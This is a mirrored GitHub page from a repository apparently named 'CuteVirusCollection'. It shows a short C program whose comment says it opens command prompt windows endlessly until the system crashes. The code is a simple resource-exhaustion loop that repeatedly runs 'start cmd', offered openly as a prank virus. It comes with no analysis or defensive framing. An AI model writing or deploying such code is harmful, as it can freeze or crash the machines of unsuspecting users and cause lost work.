mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-22 15:16:27 -08:00
11 lines
186 B
C
11 lines
186 B
C
// Developer: Minhas Kamal
|
|
// Opens an infinite number of command prompt window till the system crushes.
|
|
|
|
#include <stdlib.h>
|
|
|
|
main(){
|
|
while(1){
|
|
system("start cmd");
|
|
}
|
|
}
|